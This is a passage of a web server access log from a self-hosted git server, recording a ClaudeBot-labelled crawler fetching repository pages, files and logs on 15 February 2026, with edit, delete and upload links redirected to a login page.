"/windpacer/homepage/raw/branch/main/.Backup/html/assets/images/ControlRoom3.png" [Client 216.73.216.188] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2Fhtml%2Fassets%2Fimages%2FControlRoom1.png" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2Fhtml%2Fassets%2Fimages%2FControlRoom6.png" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/.venv/bin/pip3.12" [Client 216.73.216.188] [Length 9837] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2Fhtml%2Fassets%2Fimages%2FControlRoom5.png" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f%2Fhtml%2Fassets%2Fimages" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/pip3?display=rendered" [Client 216.73.216.188] [Length 11214] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/.venv/bin/pip3.12" [Client 216.73.216.188] [Length 957] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/.venv/bin/watchfiles" [Client 216.73.216.188] [Length 255] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2Fhtml%2Fassets%2Fimages%2FControlRoom4.png" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2Fhtml%2Fcomponents%2FAbout.tsx" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/pip?display=rendered" [Client 216.73.216.188] [Length 11212] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/.venv/bin/watchfiles" [Client 216.73.216.188] [Length 9840] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/Activate.ps1?display=rendered" [Client 216.73.216.188] [Length 11214] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2F.Backup%2Fhtml%2Fvite.config.ts" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2Fhtml%2Fcomponents%2FHero.tsx" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fbranch%2Fmain%2Fasset_pilot_docker%2F.venv%2Fbin%2Fuvicorn" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f%2Fhtml%2Findex.tsx" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2Fhtml%2Fassets%2Fimages%2FControlRoom3.png" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2Fmail_contact.py" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2Fnpm%2Fletsencrypt%2Frenewal" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2FDockerfile" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/.venv/bin/watchfiles" [Client 216.73.216.188] [Length 963] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2Fhtml%2Fassets%2Fimages%2FControlRoom2.png" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/package.json" [Client 216.73.216.188] [Length 11701] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/database.py" [Client 216.73.216.188] [Length 12320] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/init_db.py" [Client 216.73.216.188] [Length 16154] [Gzip 5.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/css/style.css" [Client 216.73.216.188] [Length 13411] [Gzip 3.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/import_csv.py" [Client 216.73.216.188] [Length 14276] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components" [Client 216.73.216.188] [Length 10604] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.2" [Client 216.73.216.188] [Length 31527] [Gzip 6.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfo.cs" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.3" [Client 216.73.216.188] [Length 38985] [Gzip 6.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/fallback_stream_access.log" [Client 216.73.216.188] [Length 11188] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/include/site/python3.12/greenlet" [Client 216.73.216.188] [Length 10085] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-1_error.log" [Client 216.73.216.188] [Length 16438] [Gzip 7.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfo.cs" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log" [Client 216.73.216.188] [Length 27875] [Gzip 5.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/database.py" [Client 216.73.216.188] [Length 12326] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfo.cs" -[15/Feb/2026:12:16:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcUaMinimal/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcUaMinimal/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfo.cs" -[15/Feb/2026:12:16:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcUaMinimal/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" -[15/Feb/2026:12:16:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcUaMinimal/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" -[15/Feb/2026:12:16:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-4_error.log" [Client 216.73.216.188] [Length 19961] [Gzip 7.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-3_error.log" [Client 216.73.216.188] [Length 13075] [Gzip 3.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/static/css" [Client 216.73.216.188] [Length 10145] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_upload/main/.Backup/html/assets/css" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_upload/main/npm/data/logs" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt-requests_error.log" [Client 216.73.216.188] [Length 11195] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_upload/main/.Backup/html/assets/css" -[15/Feb/2026:12:16:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-2_error.log" [Client 216.73.216.188] [Length 14620] [Gzip 4.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.assets.cache" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_upload/main/npm/data/logs" -[15/Feb/2026:12:16:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.assets.cache" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.assets.cache" -[15/Feb/2026:12:16:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/fallback_http_access.log" [Client 216.73.216.188] [Length 20811] [Gzip 6.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/package.json" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:32 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/package.json" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.assets.cache" -[15/Feb/2026:12:16:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/package.json" -[15/Feb/2026:12:16:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/package.json" -[15/Feb/2026:12:16:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/fallback_error.log" [Client 216.73.216.188] [Length 11609] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:32 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/.Backup/html/assets/css" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/fallback_http_error.log" [Client 216.73.216.188] [Length 14714] [Gzip 4.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:32 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/npm/data/logs" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/.Backup/html/assets/css" -[15/Feb/2026:12:16:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/npm/data/logs" -[15/Feb/2026:12:16:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/metadata.json?display=source" [Client 216.73.216.188] [Length 11281] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets" [Client 216.73.216.188] [Length 10363] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; 